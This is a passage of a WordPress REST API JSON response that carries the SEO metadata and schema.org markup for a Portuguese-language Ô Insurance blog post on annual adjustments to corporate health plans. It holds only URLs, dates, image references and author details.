valor \u00e9 autorizado, anualmente, pela ANS (Ag\u00eancia [&hellip;]","og_url":"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/","og_site_name":"\u00d4 Insurance","article_publisher":"https:\/\/www.facebook.com\/oinsurancegroup\/","article_published_time":"2020-01-17T21:19:55+00:00","article_modified_time":"2020-02-18T14:16:12+00:00","og_image":[{"width":1600,"height":900,"url":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/01\/higeoqjs_ie.jpg","type":"image\/jpeg"}],"author":"Rafael Gesser","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Rafael Gesser","Est. tempo de leitura":"5 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/#article","isPartOf":{"@id":"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/"},"author":{"name":"Rafael Gesser","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223"},"headline":"Reajuste no plano de sa\u00fade: por que acontece e como diminuir os custos?","datePublished":"2020-01-17T21:19:55+00:00","dateModified":"2020-02-18T14:16:12+00:00","mainEntityOfPage":{"@id":"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/"},"wordCount":927,"commentCount":0,"publisher":{"@id":"https:\/\/blog.oinsurance.com.br\/#organization"},"image":{"@id":"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/#primaryimage"},"thumbnailUrl":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/01\/higeoqjs_ie.jpg","articleSection":["Gest\u00e3o de benef\u00edcios"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/","url":"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/","name":"Reajuste no plano de sa\u00fade: por que acontece e como diminuir os custos? - \u00d4 Insurance","isPartOf":{"@id":"https:\/\/blog.oinsurance.com.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/#primaryimage"},"image":{"@id":"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/#primaryimage"},"thumbnailUrl":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/01\/higeoqjs_ie.jpg","datePublished":"2020-01-17T21:19:55+00:00","dateModified":"2020-02-18T14:16:12+00:00","breadcrumb":{"@id":"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/#primaryimage","url":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/01\/higeoqjs_ie.jpg","contentUrl":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/01\/higeoqjs_ie.jpg","width":1600,"height":900},{"@type":"BreadcrumbList","@id":"https:\/\/oinsurance.com.br\/blog\/reajuste-plano-de-saude-empresarial\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/blog.oinsurance.com.br\/"},{"@type":"ListItem","position":2,"name":"Reajuste no plano de sa\u00fade: por que acontece e como diminuir os custos?"}]},{"@type":"WebSite","@id":"https:\/\/blog.oinsurance.com.br\/#website","url":"https:\/\/blog.oinsurance.com.br\/","name":"\u00d4 Insurance","description":"Seguros Pessoais e Empresariais","publisher":{"@id":"https:\/\/blog.oinsurance.com.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/blog.oinsurance.com.br\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/blog.oinsurance.com.br\/#organization","name":"\u00d4 Insurance","url":"https:\/\/blog.oinsurance.com.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/","url":"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1","contentUrl":"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1","width":409,"height":179,"caption":"\u00d4 Insurance"},"image":{"@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/oinsurancegroup\/","https:\/\/www.instagram.com\/oinsurance\/","https:\/\/www.linkedin.com\/company\/oinsurance\/"]},{"@type":"Person","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223","name":"Rafael Gesser","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g","caption":"Rafael Gesser"}}]}},"_links":{"self":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/posts\/1126"}],"collection":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/comments?post=1126"}],"version-history":[{"count":0,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/posts\/1126\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/media\/1214"}],"wp:attachment":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/media?parent=1126"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/categories?post=1126"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/tags?post=1126"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}